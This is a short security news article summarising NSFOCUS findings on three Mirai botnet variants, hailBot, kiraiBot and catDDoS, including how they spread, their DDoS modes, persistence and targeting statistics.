Several new variants of the Mirai botnet have been found to be active since September. Out of these, three botnet variants—hailBot, kiraiBot, and catDDoS—have grabbed the attention of NSFOCUS researchers who shared technical details for the same.
hailBot
Derived from the string information ‘hail china mainland,’ hailBot was first discovered toward the end of last year.
- It supports four DDoS attack methods based on TCP and UDP protocols.
- It spreads via brute-force attacks or exploitation of an old vulnerability (CVE-2017-17215) affecting the Huawei HG532 router.
- In some cases observed, the exploit for the vulnerability was distributed via bait documents named ‘INVOICE.xlsx’, ‘Product_requetslist.xlsx’, or ‘CIF WMS REF NO 451RFQ ARN-DT-2021-06-29.xlsx.’
- Click on these would download the botnet and other banking trojans, including Lokibot and Formbook.
- It is designed to target financial and trade institutions, as well as IoT platforms.
While the botnet has not issued too many commands recently, researchers claim that there are many C2 servers associated with the variant, which continue to increase.
kiraiBot
- Designed to support six DDoS attack modes, the botnet derives its name from the string information ‘kirai’.
- The bot achieves persistence by configuring a self-starting script in "/etc/init.d/init.d/."
- So far, the known propagation mode is via weak password scanning through port 23.
The "kirai" string is evident in the bot's scan traffic, and it employs a report server inspired by Mirai to receive breach results. Unlike C&C servers, the site storing kiraiBot propagation scripts varies.
catDDoS
This variant introduces the ChaCha20 algorithm in the Mirai source code to encrypt and store some key information.
- Attackers performed 63% of ack_flood attacks and 29% of grip_flood attacks.
- The majority of its targets are located in China (58%), followed by the U.S. (25%). Other countries affected by this are Japan, Singapore, and France.
- The variant also features the OpenNIC domain name, which is quite similar to the Fodcha family, to evade detection.
- Its attack timings are mostly from 8 a.m. to 9 p.m.
Conclusion
Reusing code from existing malware has always been a go-to way to introduce new variants in the threat landscape, and the Mirai source code is writing its legacy. While the primary purpose behind this malware code reuse is to enhance stealth and expand attack surfaces, organizations are advised to leverage IOCs of respective botnets to get a better understanding of attackers' TTPs.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_196375760.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/1d85_shutterstock_729070279.jpg)
